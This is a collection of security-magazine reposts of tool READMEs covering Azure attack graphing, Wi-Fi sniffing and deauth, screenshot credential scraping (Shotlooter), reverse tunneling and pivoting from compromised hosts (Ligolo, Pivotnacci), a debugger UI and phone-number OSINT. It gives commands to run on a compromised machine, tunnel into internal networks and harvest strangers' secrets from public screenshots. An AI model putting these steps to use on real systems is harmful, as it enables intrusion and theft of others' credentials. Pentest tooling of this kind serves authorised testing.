
Stormspotter - Azure Red Team tool for graphing Azure and Azure Active Directory objects


Stormspotter creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.

It needs Reader access to the subscription(s) you wish to import and Directory.Read access to the Azure AD tenant.


Getting Started

Prerequisites

  • Stormspotter is developed in Python 3.8.
  • Install Neo4j. Currently, neo4j 4.0 may cause errors when launching Stormdash if you do not manually configure it with an SSL cert. Installation directions for your preferred operating system are located here, although you may prefer the ease of a docker container:
docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18

Running Stormspotter

In order to avoid conflicting packages, it is highly recommended to run Stormspotter in a virtual environment.

  1. Install the requirements
    • From the repository (RECOMMENDED)
    git clone https://github.com/Azure/Stormspotter
    cd Stormspotter
    pipenv install .
    
    • Via pipenv
    python -m pip install pipenv
    pipenv install stormspotter==1.0.0a0
    

Providing credentials

Current login types supported:

  • Azure CLI (must use az login first)
  • Service Principal Client ID/Secret

Gather and view resources

  1. Run stormspotter to gather resource and object information
    • Via CLI login
    stormspotter --cli
    
    • Via Service Principal
    stormspotter --service-principal -u <client id> -p <client secret> -t <tenant id>
    
  2. Run stormdash to launch dashboard
    stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
    
  3. During installation, a .stormspotter folder is created in the user's home directory. Place the results zip file into the ~/.stormspotter/input folder. You may also place the zip file into the folder before running stormdash and it will be processed when Stormspotter starts. When a file is successfully processed, it will be moved into ~/.stormspotter/processed.
  4. Browse to http://127.0.0.1:8050 to interact with the graph.

Notes

  • With Stormspotter currently in alpha, not all resource types have been implemented in Stormdash. You may see labels with missing icons and/or nodes that simply display the "name" and "type" fields. You can still view the data associated with these assets by clicking the "Raw Data" slider. Over time, more resources will be properly implemented.
  • The node expansion feature has not been implemented yet. This feature will allow you to interact with a node to see all of its relations. As a fallback to Stormdash, you can visit the Neo4j instance directly to use this feature (see the sketch below).
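
A minimal sketch of querying the graph directly with the official neo4j Python driver might look like this; the connection details match the docker command above, and the node name and Cypher pattern are placeholders, since Stormspotter's exact graph schema isn't documented here:

from neo4j import GraphDatabase

# Credentials and bolt port from the docker run command above; adjust to your setup
driver = GraphDatabase.driver("bolt://127.0.0.1:7687", auth=("neo4j", "password"))

with driver.session() as session:
    # List the node labels Stormspotter has ingested so far
    for record in session.run("CALL db.labels()"):
        print(record[0])

    # Show a node and its immediate relationships (the "expansion" Stormdash lacks)
    query = (
        "MATCH (n {name: $name})-[r]-(m) "
        "RETURN n.name, type(r), labels(m), m.name LIMIT 25"
    )
    for record in session.run(query, name="example-resource"):
        print(record.values())

driver.close()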

Screenshots

Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.


More: https://github.com/Azure/Stormspotter

The post Stormspotter - Azure Red Team tool for graphing Azure and Azure Active Directory objects appeared first on Hakin9 - IT Security Magazine.


Pi Sniffer is a Wi-Fi sniffer built on the Raspberry Pi Zero W


Pi Sniffer is a Wi-Fi sniffer built on the Raspberry Pi Zero W. While there are many excellent sniffing platforms out there, Pi Sniffer is unique for its small size, real-time display of captured data, and handling of user input.

Current Release Image

You can download an RPI image of this project from the "Releases" page. If you don't trust that, you can generate your own release by using the image_gen/create_image.sh script.

Project Goals

The goal of this project was to create a Wi-Fi sniffer that I could carry around in my pocket, easily view real-time status, decrypt packets on the fly, and change antenna channels as needed. Also, I wanted this project to be cheap (less than $100) and require no soldering.

Hardware

The project was conceived with the goal of avoiding any type of soldering. While Pi Sniffer does require the GPIO header on the Raspberry Pi Zero W, you can buy that pre-soldered. So I'm gonna claim no soldering required.

The base install requires:

Additionally, you can configure the device with any of the following add-ons (and still reasonably be called pocket sized):

Software

Download the release image and flash it to an SD card. Stick the SD card into your RPI Zero WH and you should be good to go! By default, SSH should be enabled. Use the default pi:raspberry credentials. The device's hostname is pisniffer, so something along the following lines should get you in:

ssh pi@pisniffer.local

Controls

Pi Sniffer isn't unique just due to its size; it also offers controls. The user can start and stop sniffing, change channels, deauth clients, and more. Here are some images showing how to use the controls.

Start, Stop, and Shutdown

To start sniffing hit the #6 button. To stop sniffing hit the #5 button. To shutdown the device hold #5 and #6.

Channel Hopping

To change to a specific channel, rotate to the antenna screen and hit #6. This will cycle you through the available channels plus hopping.

Deauth Attack

To deauth a client, find them in the client view and hit #6.

Lock display

Sometimes it's beneficial to lock the screen and controls. To do so, rotate to the lock screen and hit #6. To unlock you need to hit #5 and push up on the joystick at the same time.

Issues and Pull Requests

Issues and pull requests are welcome. I only ask that you provide enough information to recreate the issue or information about why the pull request should be accepted.


More: https://github.com/tenable/pi_sniffer

The post Pi Sniffer is a Wi-Fi sniffer built on the Raspberry Pi Zero W appeared first on Hakin9 - IT Security Magazine.

Shotlooter - a recon tool that finds sensitive data inside the screenshots uploaded to prnt.sc


Shotlooter is a recon tool developed to find sensitive data inside screenshots uploaded to https://prnt.sc/ (via the LightShot software) by applying OCR and image processing methods.

                                                              +-------------------+
    IMAGE FILE                                                |#!/usr/bin/python  |
+--------------------+                                        |                   +----->SENSITIVE
|prnt.sc/sjgmm5      |                                        |Search for:        |
+--------------------+                                        |                   |
|      _             |      CONVERTS          STRING          |sensitive keywords |
|  .-.-.=\-          |      +-------+     +------------+      |                   |
|  (_)=='(_)         |      |       |     |            |      |high entropy       |
|              .._\  +----->+  OCR  +---->+ TEXTTEXTT  +----->+                   |
|             (o)(o) |      |       |     |            |      |credit card pattern+----->NOT SENSITIVE
|   TEXTTEXTTEX      |      +-------+     +------------+      |                   |
|                    |                                        +-------------------+
+--------------+------+
               |                 +-----------------------+
               v                 |#!/usr/bin/python      |
SMALLER         IMAGES           |                       +------>SENSITIVE
+-------------+ +------------+   |Image processing:      |
|    _        | |    .._\    |   |                       |
| .-.-.=\-    | |   (o)(o)   +-->+ Does it contain:      |
| (_)=='(_)   | |            |   |   ~~O                 |
+-------------+ +------------+   |    /\,                |
                                 |   -|~(*)              +------>NOT SENSITIVE
                                 |  (*)                  |
                                 +-----------------------+

How does it work?

  1. Starting from the given image id, Shotlooter iterates through images (yes, image ids are not random) and downloads them locally.
  2. Extracts the text inside each image using the Tesseract OCR library (see the sketch after this list).
  3. Searches the extracted text for predefined keywords (private_key, smtp_pass, access key, mongodb+srv, etc.)
  4. Searches for strings with high entropy (API keys usually have high entropy)
  5. Searches for small images (e.g. the LastPass logo) inside the downloaded image (Template Matching) with OpenCV.
  6. Saves the results to a CSV file
  7. Saves images that contain sensitive data to the output folder
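
As a minimal illustration of steps 2 and 3 (not Shotlooter's actual code), an OCR-plus-keyword pass might look like the following, assuming pytesseract and Pillow are installed and a keywords.txt file with one keyword per line exists:

import pytesseract
from PIL import Image

def extract_text(image_path):
    # Step 2: convert the screenshot to plain text with the Tesseract OCR engine
    return pytesseract.image_to_string(Image.open(image_path))

def find_keywords(text, keyword_file="keywords.txt"):
    # Step 3: naive keyword match against the extracted text
    with open(keyword_file) as f:
        keywords = [line.strip() for line in f if line.strip()]
    lowered = text.lower()
    return [kw for kw in keywords if kw.lower() in lowered]

if __name__ == "__main__":
    text = extract_text("screenshot.png")
    print("Potentially sensitive keywords found:", find_keywords(text))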

Installation

Shotlooter requires Python 3 and pip3, and has been tested on macOS and Debian-based Linux systems.

Installing Dependencies for macOS: brew install tesseract

Installing Dependencies for Debian Based Linux: sudo apt install libsm6 libxext6 libxrender-dev tesseract-ocr -y

Clone the repository:

git clone https://github.com/utkusen/shotlooter.git

Go inside the folder

cd shotlooter

Install required libraries

pip3 install -r requirements.txt

Usage

Basic Usage: python3 shotlooter.py --code PRNT.SC_ID

It searches for matching keywords (located in keywords.txt), high entropy strings and credit card numbers. You can find an id by uploading an image to https://prnt.sc/ . For example python3 shotlooter.py --code sjgmm5

It will check the ids by incrementing them one by one:

sjgmm6
sjgmm7
sjgmm8
sjgmm9
sjgmma
sjgmmb
...

Image Search: python3 shotlooter.py --code sjgmm5 --imagedir IMAGE_FOLDER_PATH

It will search for the items covered in basic usage + will search for provided small images in the bigger screenshots. If you are planning to use this feature, put your small images inside the img folder.

Exclude Search: You can exclude any search type by providing the related argument: --no-cc, --no-entropy, --no-keyword

For example: python3 shotlooter.py --code sjgmm5 --no-entropy. Shotlooter will skip high entropy string checking.

A Note For The False Positives

Shotlooter has high false-positive rates for high-entropy string and credit card matching. Actually, they are not really false positives, but they may not be the items that you are looking for. It detects high-entropy strings to catch API keys, private keys, etc. However, any non-sensitive random string will have high entropy too, and Shotlooter will detect it. The same goes for credit card matching.

If you don't want to deal with false positives, exclude entropy and credit card searches.
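
For context on the entropy check described above: it boils down to Shannon entropy over the characters of a string. A minimal sketch (the sample strings and any threshold you pick are illustrative, not Shotlooter's values):

import math
from collections import Counter

def shannon_entropy(s):
    # Entropy in bits per character; random API-key-like strings score high
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

print(shannon_entropy("password123"))           # fairly low
print(shannon_entropy("AKIAIOSFODNN7EXAMPLE"))  # AWS-style key id, higher
print(shannon_entropy("aaaaaaaaaaaaaaaaaaaa"))  # ~0, no randomness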

What You Should Expect to Find?

I ran Shotlooter for 2 weeks and identified 300+ images containing various kinds of sensitive data. The findings I encountered most often are listed below:

Postman Requests

It contains useful session IDs, access tokens etc.

Cloud API Keys (Google, AWS)

Screenshots are taken from the cloud's console or from a desktop client

Session ID on the URL

We all know that it's not good to pass the session ID with a GET request for different reasons. This is one of them.

Credentials on Excel Sheets

Some people love to use Excel as a password manager.

Bitcoin Private Keys (This is Terrible)

Bitcoin wallets allow you to export your private key so that you can import it into somewhere else. But if you publish the screenshot of your private key, your whole wallet can be compromised.


More: https://github.com/utkusen/shotlooter

The post Shotlooter - a recon tool that finds sensitive data inside the screenshots uploaded to prnt.sc appeared first on Hakin9 - IT Security Magazine.

Ligolo: Reverse Tunneling made easy for pentesters, by pentesters


Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with an elliptic curve).

It is comparable to Meterpreter with Autoroute + Socks4a, but more stable and faster.

Use case

You compromised a Windows / Linux / Mac server during your external audit. This server is located inside a LAN network and you want to establish connections to other machines on this network.

You can set up a tunnel to access the internal server's resources.

Quick Demo

Relay of an RDP connection using Proxychains (WAN).

Performance

Here is a screenshot of a speedtest between two 100 Mb/s hosts (ligolo/localrelay). Performance may vary depending on the system and network configuration.

Usage

Setup / Compiling

Make sure Go is installed and working.

  1. Get Ligolo and dependencies
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  2. Generate self-signed TLS certificates (will be placed in the certs folder)
make certs TLS_HOST=example.com

NOTE: You can also use your own certificates by using the TLS_CERT make option when calling build. Example: make build-all TLS_CERT=certs/mycert.pem.

  3. Build
  • 3.1. For all architectures
make build-all
  • 3.2. (or) For the current architecture
make build

How to use it?

Ligolo consists of two modules:

  • localrelay
  • ligolo

Localrelay is intended to be launched on the control server (the attacker server).

Ligolo is the program to run on the target computer.

For localrelay, you can leave the default options. It will listen on every interface on port 5555 and wait for connections from ligolo (-relayserver parameter).

For ligolo, you must specify the IP address of the relay server (or your attack server) using the -relayserver ip:port parameter.

You can use the -h option for help.

Once the connection has been established between Ligolo and LocalRelay, a SOCKS5 proxy will be set up on TCP port 1080 on the relay server (you can change the TCP address/port using the -localserver option).

After that, all you have to do is use your favorite tool (Proxychains for example), and explore the client's LAN network.

TL;DR

On your attack server.

./bin/localrelay_linux_amd64

On the compromised host.

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

Once the connection is established, set the following parameters on the ProxyChains config file (On the attack server):

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

Profit.

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

Options

Localrelay options:

Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo options:

Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

Features

  • TLS 1.3 tunnel with TLS pinning
  • Multiplatforms (Windows / Linux / Mac / ...)
  • Multiplexing (1 TCP connection for all flows)
  • SOCKS5 proxy or simple relay

To Do

  • Better timeout handling
  • SOCKS5 UDP support
  • Implement mTLS

Credits

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

More: https://github.com/sysdream/ligolo

The post Ligolo: Reverse Tunneling made easy for pentesters, by pentesters appeared first on Hakin9 - IT Security Magazine.

Voltron - an extensible debugger UI toolkit written in Python


Voltron is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host. By running these views in other TTYs, you can build a customised debugger user interface to suit your needs.

Voltron does not aim to be everything to everyone. It's not a wholesale replacement for your debugger's CLI. Rather, it aims to complement your existing setup and allow you to extend your CLI debugger as much or as little as you like. If you just want a view of the register contents in a window alongside your debugger, you can do that. If you want to go all out and have something that looks more like OllyDbg, you can do that too.

Built-in views are provided for:

  • Registers
  • Disassembly
  • Stack
  • Memory
  • Breakpoints
  • Backtrace

The author's setup looks something like this:

Any debugger command can be split off into a view and highlighted with a specified Pygments lexer:

More screenshots are here.

Support

Voltron supports LLDB, GDB, VDB, and WinDbg/CDB (via PyKD) and runs on macOS, Linux, and Windows.

WinDbg support is still fairly new; please open an issue if you have problems.

The following architectures are supported, with coverage varying between lldb, gdb, vdb and windbg:

  • x86
  • x86_64
  • arm
  • arm64
  • powerpc

Installation

The Voltron package and its dependencies must be installed somewhere the Python interpreter embedded in the debugger can find them. Voltron includes an install script which will attempt to detect the supported debuggers that are installed on the system, and will install Voltron and its Python dependencies using the appropriate version of Python for each debugger.

To install with the install script, download the source and run it from the root level of the source tree:

$ ./install.sh

If you'd rather install to the system site-packages directory, pass the -s flag:

$ ./install.sh -s

You can also install into a Python virtual environment for LLDB:

$ ./install.sh -v /path/to/venv -b lldb

This install script should cover the vast majority of use cases, but if it fails to install properly on your system (or you'd rather install manually) the following instructions are provided for each platform.

macOS

On macOS, LLDB (installed by Xcode) and GDB (installed by Homebrew) are both linked against the system's default version of Python, so Voltron must be installed using this version of Python. On systems without any other Python installation, you can just go ahead and install with pip as above.

On systems with other versions of Python installed (via Homebrew, MacPorts or other methods), you may need to explicitly specify the system version of Python:

$ /usr/bin/python -m pip install voltron [ --user ]

Other installations of LLDB or GDB (manually compiled or installed with MacPorts) may be linked with other Python installations, so you'll need to install Voltron with whichever the debugger is linked against.

You can find out which version of Python your debugger is linked against with otool:

$ otool -L /usr/local/bin/gdb|grep -i python
    /System/Library/Frameworks/Python.framework/Versions/2.7/Python (compatibility version 2.7.0, current version 2.7.5)

This version of GDB above is installed with Homebrew, so it's linked against the system Python. You'll have to figure out which installation of Python your debugger is linked with and where the python binary is on your own, but when you do you can install Voltron with:

$ /path/to/python -m pip install voltron [ --user ]

Linux

Ubuntu

Ubuntu (at least 14.04) comes with Python versions 2 and 3. GDB is linked with Python 3, but /usr/bin/python is Python 2. In order to get Voltron to work you'll need to install Voltron into the Python 3 site-packages.

First, install some dependencies:

$ sudo apt-get install libreadline6-dev python3-dev python3-setuptools python3-yaml

Then install Voltron:

$ pip3 install voltron

Other distros

You're mostly on your own here. You can figure out which version of Python the debugger is linked with using readelf:

$ readelf -d `which gdb`|grep python
0x0000000000000001 (NEEDED)             Shared library: [libpython3.4m.so.1.0]

Then you'll need to install Voltron using that version of Python, wherever it lives:

$ /path/to/python -m pip install voltron [ --user ]

Windows

WinDbg

Voltron support for WinDbg is implemented by way of the PyKD module.

  1. Install WinDbg via Windows SDK for your Windows version
  2. Download the zip of the latest release of PyKD
  3. Install the PyKD module. If you know how to do this properly (install it to the WinDbg extensions dir, which I gave up on because it didn't want to work on my system), then do it. I just load it in WinDbg by absolute path.
  4. Install the PyKD Python wheel with pip:
     $ pip install pykd-0.3.0.38-py2-none-win_amd64.whl
    
  5. Install the curses Python wheel:
     $ pip install curses-2.2-cp27-none-win_amd64.whl
    

Troubleshooting

  1. Make sure you have the same bitness versions of Python and PyKD (possibly WinDbg but I don't think there's an option).

VDB

TBC

Virtual environments

Voltron can be installed into a Python virtual environment if you'd rather not install it (and all its dependencies) into your Python site-packages directory. You'll need to make sure you're using the correct installation of Python per the installation instructions above.

Create a virtual environment:

$ virtualenv voltron_venv

Or, if you're using a Python installation that the virtualenv executable in your path does not belong to:

$ /path/to/python -m virtualenv voltron_venv

Install Voltron into the virtual environment:

$ voltron_venv/bin/pip install voltron

Now when you launch the debugger, you'll need to set your PYTHONPATH environment variable:

$ PYTHONPATH=voltron_venv/lib/python2.7/site-packages lldb

Note the Python version in the path there - that will need to reflect whatever the actual path to the site-packages dir inside the virtual environment is. You could also set and export this variable in your shell init.

When you launch the views, you'll need to call the voltron executable inside the virtual environment:

$ voltron_venv/bin/voltron view reg

You could also add the venv to your PATH environment variable.

Please see the manual installation documentation.

Quick Start

  1. If your debugger has an init script (.lldbinit for LLDB or .gdbinit for GDB), configure it to load Voltron when it starts by sourcing the entry.py entry point script. The full path will be inside the voltron package. For example, on macOS it might be /Library/Python/2.7/site-packages/voltron/entry.py. The install.sh script will add this to your .gdbinit or .lldbinit file automatically if it detects GDB or LLDB in your path.

    LLDB:
     command script import /path/to/voltron/entry.py
    

    GDB:

     source /path/to/voltron/entry.py
    
  2. Start your debugger and initialise Voltron manually if necessary. On recent versions of LLDB you do not need to initialise Voltron manually:
     $ lldb target_binary
    

    On older versions of LLDB you need to call voltron init after you load the inferior:

     $ lldb target_binary
     (lldb) voltron init
    

    GDB:

     $ gdb target_binary
    

    VDB:

     $ ./vdbbin target_binary
     > script /path/to/voltron/entry.py
    

    WinDbg/CDB is only supported when run via Bash with a Linux userland. The author tests with Git Bash and ConEmu. PyKD and Voltron can be loaded in one command when launching the debugger:

     $ cdb -c '.load C:\path\to\pykd.pyd ; !py --global C:\path\to\voltron\entry.py' target_binary
    
  3. In another terminal (I use iTerm panes) start one of the UI views. On LLDB, WinDbg and GDB the views will update immediately. On VDB they will not update until the inferior stops (at a breakpoint, after a step, etc):
     $ voltron view register
     $ voltron view stack
     $ voltron view disasm
     $ voltron view backtrace
    
  4. Set a breakpoint and run your inferior.
     (*db) b main
     (*db) run
    
  5. When the debugger hits the breakpoint, the views will be updated to reflect the current state of registers, stack, memory, etc. Views are updated after each command is executed in the debugger CLI, using the debugger's "stop hook" mechanism. So each time you step, or continue and hit a breakpoint, the views will update.

Documentation

See the wiki on github.

FAQ

Q. Why am I getting an ImportError loading Voltron?

A. You might have multiple versions of Python installed and have installed Voltron using the wrong one. See the more detailed installation instructions.

Q. GEF? PEDA? PwnDbg? fG's gdbinit?

A. All super great extensions for GDB. These tools primarily provide sets of additional commands for exploitation tasks, but each also provides a "context" display with a view of registers, stack, code, etc, like Voltron. These tools print their context display in the debugger console each time the debugger stops. Voltron takes a different approach by embedding an RPC server implant in the debugger and enabling the attachment of views from other terminals (or even web browsers, or now synchronising with Binary Ninja), which allows the user to build a cleaner multi-window interface to their debugger. Voltron works great alongside all of these tools. You can just disable the context display in your GDB extension of choice and hook up some Voltron views, while still getting all the benefits of the useful commands added by these tools.

Bugs and Errata

See the issue tracker on github for more information or to submit issues.

If you're experiencing an ImportError loading Voltron, please ensure you've followed the installation instructions for your platform.

LLDB

On older versions of LLDB, the voltron init command must be run manually after loading the debug target, as a target must be loaded before Voltron's hooks can be installed. Voltron will attempt to automatically register its event handler, and it will inform the user if voltron init is required.

WinDbg

More information about WinDbg/CDB support here.

Misc

The authors primarily use Voltron with the most recent version of LLDB on macOS. We will try to test everything on as many platforms and architectures as possible before releases, but LLDB/macOS/x64 is going to be by far the most frequently-used combination. Hopefully Voltron doesn't set your pets on fire, but YMMV.

License

See the LICENSE file.

If you use this and don't hate it, buy me a beer at a conference some time. This license also extends to other contributors - richo definitely deserves a few beers for his contributions.

Credits

Thanks to my former employers Assurance and Azimuth Security for giving me time to spend working on this.

Props to richo for all his contributions to Voltron.

fG!'s gdbinit was the original inspiration for this project.

Thanks to Willi for implementing the VDB support.

Voltron now uses Capstone for disassembly as well as the debugger hosts' internal disassembly mechanism. Capstone is a powerful, open source, multi-architecture disassembler upon which the next generation of reverse engineering and debugging tools are being built. Check it out.

Thanks to grazfather for ongoing contributions.


More: https://github.com/snare/voltron

The post Voltron - an extensible debugger UI toolkit written in Python appeared first on Hakin9 - IT Security Magazine.

PhoneInfoga - Advanced information gathering & OSINT framework for phone numbers


PhoneInfoga is one of the most advanced tools to scan international phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier, and line type on any international phone numbers with very good accuracy. Then search for footprints on search engines to try to find the VoIP provider or identify the owner.
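
PhoneInfoga itself is written in Go, but as a rough illustration of what this "standard information" step involves, the Python phonenumbers library (a port of Google's libphonenumber) produces the same kind of data; the number below is a placeholder:

import phonenumbers
from phonenumbers import carrier, geocoder

number = phonenumbers.parse("+14155552671", None)  # placeholder number

print("valid:", phonenumbers.is_valid_number(number))
print("possible:", phonenumbers.is_possible_number(number))
print("region:", phonenumbers.region_code_for_number(number))
print("location:", geocoder.description_for_number(number, "en"))
print("carrier:", carrier.name_for_number(number, "en"))
print("line type:", phonenumbers.number_type(number))  # integer from PhoneNumberType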

Features

  • Check if phone number exists and is possible
  • Gather standard information such as country, line type and carrier
  • OSINT footprinting using external APIs, Google Hacking, phone books & search engines
  • Check for reputation reports, social media, disposable numbers and more
  • Scan several numbers at once
  • Use custom formatting for more effective OSINT reconnaissance
  • NEW: Serve a web client along with a REST API to run scans from the browser
  • NEW: Run your own web instance as a service
  • NEW: Programmatic usage with Go modules

Anti-features

  • Does not claim to provide relevant or verified data, it's just a tool!
  • Does not allow to "track" a phone or its owner in real time
  • Does not allow to get the precise phone location
  • Does not allow to hack a phone

Current status

This project is under active development but is stable and production-ready. The Numverify scan is pointless on the demo instance because my server's IP got blocked due to spam. The roadmap is here.

This project has recently been rewritten in Go (previously Python). Why? To improve the code base and maintainability, build a stronger test suite, and be able to compile the code base. PhoneInfoga v2 brings new features such as serving a REST API and a web client. Scanner usage was improved in order to drop the dependency on Selenium/Geckodriver, which caused troubleshooting headaches for many users. You can still use the legacy version in tag v1.11 and the legacy Docker image (sundowndev/phoneinfoga:legacy). Some features were not included in the v2 MVP, such as input/output CLI options. The project roadmap changed so we can focus on web client features such as downloading scan results as CSV, Instagram/WhatsApp lookup, and more. Version 2 does not scan Google results anymore, read more.

  • Documentation
  • API documentation
  • Demo instance
  • Related blog post

Installation

To install PhoneInfoga, you'll need to download the binary or build the software from its source code.

For now, only Linux and macOS are supported. If you don't see your OS/arch on the release page on GitHub, it means it's not explicitly supported. You can always build from source yourself. Want your OS to be supported? Please open an issue on GitHub.

Binary installation (recommended)

Follow these instructions:

  • Go to release page on GitHub
  • Choose your OS and architecture
  • Download the archive, extract the binary then run it in a terminal

You can also do it from the terminal:

# Download the archive
curl -L "https://github.com/sundowndev/phoneinfoga/releases/download/v2.0.8/phoneinfoga_$(uname -s)_$(uname -m).tar.gz" -o phoneinfoga.tar.gz

# Extract the binary
tar xfv phoneinfoga.tar.gz

# Run the software
./phoneinfoga --help

# You can install it globally
mv ./phoneinfoga /usr/bin/phoneinfoga

If the installation fails, it probably means your OS/arch is not supported.

Please check the output of echo "$(uname -s)_$(uname -m)" in your terminal and see if it's available on the GitHub release page.

Using Docker

From docker hub

You can pull the repository directly from Docker hub

docker pull sundowndev/phoneinfoga:latest

Then run the tool

docker run --rm -it sundowndev/phoneinfoga version

Docker-compose

You can use a single docker-compose file to run the tool without downloading the source code.

version: '3.7'

services:
    phoneinfoga:
      container_name: phoneinfoga
      restart: on-failure
      image: phoneinfoga:latest
      command: serve
      ports:
        - "80:5000"

From the source code

You can download the source code, then build the docker images

Build

Build the image

docker-compose build

CLI usage

docker-compose run --rm phoneinfoga --help

Run web services

docker-compose up -d

DISABLE WEB CLIENT

Edit docker-compose.yml and add the --no-client option

# docker-compose.yml
command: "serve --no-client"

Troubleshooting

All output is sent to stdout so it can be inspected by running:

docker logs -f <container-id|container-name>

Getting started

Here is the documentation for CLI usage of the tool.

$ phoneinfoga

PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources.

Usage:
  phoneinfoga [command]

Available Commands:
  help        Help about any command
  scan        Scan a phone number
  serve       Serve web client
  version     Print current version of the tool

Flags:
  -h, --help   help for phoneinfoga

Use "phoneinfoga [command] --help" for more information about a command.

Basic scan

phoneinfoga scan -n "+1 (555) 444-1212"
phoneinfoga scan -n "+33 06 79368229"
phoneinfoga scan -n "33679368229"

The country code and special chars such as ( ) - + will be escaped, so typing US-based numbers stays easy:

phoneinfoga scan -n "+1 555-444-3333"

Note that the country code is essential. Don't know which country code to use? Find it here

Available scanners

  • Numverify
  • Google search
  • OVH

Numverify provides standard but useful information such as the number's country code, location, line type and carrier.

OVH is, besides being a web and cloud hosting company, a telecom provider with several VoIP numbers in Europe. Thanks to their API-key free REST API, we are able to tell if a number is owned by OVH Telecom or not.

Google search uses the Google search engine and Google dorks to search for a phone number's footprints everywhere on the web. It allows you to search for scam reports, social media profiles, documents and more. This scanner does only one thing: generating several Google search links from a given phone number. You then have to manually open them in your browser to see the results, so you may end up with links that do not return anything.
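
A hypothetical sketch of that link-generation idea (the dork queries below are illustrative, not PhoneInfoga's actual list):

from urllib.parse import quote_plus

def google_dork_links(number):
    # A couple of illustrative dork templates; PhoneInfoga ships its own list
    formats = [number, number.replace("+", "")]
    templates = [
        'intext:"{n}"',
        'site:pastebin.com intext:"{n}"',
        'intext:"{n}" intext:"scam" OR intext:"spam"',
    ]
    return [
        "https://www.google.com/search?q=" + quote_plus(t.format(n=n))
        for n in formats
        for t in templates
    ]

for link in google_dork_links("+1 555-444-1212"):
    print(link)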

Launch web client & REST API

Run the tool through a REST API with a web client. The API has been written in Go and the web client in Vue.js.

phoneinfoga serve
phoneinfoga serve -p 8080 # default port is 5000

You should then be able to see the web client at http://localhost:<port>.

Run the REST API only

You can choose to only run the REST API without the graphical interface:

phoneinfoga serve --no-client

Demo: https://demo.phoneinfoga.crvx.fr

More: https://github.com/sundowndev/PhoneInfoga

The post PhoneInfoga - Advanced information gathering & OSINT framework for phone numbers appeared first on Hakin9 - IT Security Magazine.

Pivotnacci - A tool to make socks connections through HTTP agents


Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server which communicates with HTTP agents. The architecture looks like the following:

This tool was inspired by the great reGeorg. However, it includes some improvements:

  • Support for balanced servers
  • Customizable polling interval, useful to reduce detection rates
  • Auto drop connections closed by a server
  • Modular and cleaner code
  • Installation through pip
  • Password-protected agents

Supported socks protocols

  • Socks 4
  • Socks 5
    • No authentication
    • User password
    • GSSAPI

Installation

From python packages:

pip3 install pivotnacci

From repository:

git clone https://github.com/blackarrowsec/pivotnacci.git
cd pivotnacci/
pip3 install -r requirements.txt # to avoid installing on the OS
python3 setup.py install # to install on the OS

Usage

  1. Upload the required agent (php, jsp or aspx) to a webserver
  2. Start the socks server once the agent is deployed
  3. Configure proxychains or any other proxy client (the default listening port for pivotnacci socks server is 1080)
$ pivotnacci -h
usage: pivotnacci [-h] [-s addr] [-p port] [--verbose] [--ack-message message]
                  [--password password] [--user-agent user_agent]
                  [--header header] [--proxy [protocol://]host[:port]]
                  [--type type] [--polling-interval milliseconds]
                  [--request-tries number] [--retry-interval milliseconds]
                  url

Socks server for HTTP agents

positional arguments:
  url                   The url of the agent

optional arguments:
  -h, --help            show this help message and exit
  -s addr, --source addr
                        The default listening address (default: 127.0.0.1)
  -p port, --port port  The default listening port (default: 1080)
  --verbose, -v
  --ack-message message, -a message
                        Message returned by the agent web page (default:
                        Server Error 500 (Internal Error))
  --password password   Password to communicate with the agent (default: )
  --user-agent user_agent, -A user_agent
                        The User-Agent header sent to the agent (default:
                        pivotnacci/0.0.1)
  --header header, -H header
                        Send custom header. Specify in the form 'Name: Value'
                        (default: None)
  --proxy [protocol://]host[:port], -x [protocol://]host[:port]
                        Set the HTTP proxy to use.(Environment variables
                        HTTP_PROXY and HTTPS_PROXY are also supported)
                        (default: None)
  --type type, -t type  To specify agent type in case is not automatically
                        detected. Options are ['php', 'jsp', 'aspx'] (default:
                        None)
  --polling-interval milliseconds
                        Interval to poll the agents (for recv operations)
                        (default: 100)
  --request-tries number
                        The number of retries for each request to an agent. To
                        use in case of balanced servers (default: 50)
  --retry-interval milliseconds
                        Interval to retry a failure request (due a balanced
                        server) (default: 100)

Examples

Using an agent with a password s3cr3t (the AGENT_PASSWORD variable must be modified on the agent side as well):

pivotnacci  https://domain.com/agent.php --password "s3cr3t"

Using a custom HTTP Host header and a custom CustomAgent User-Agent:

pivotnacci  https://domain.com/agent.jsp -H 'Host: vhost.domain.com' -A 'CustomAgent'

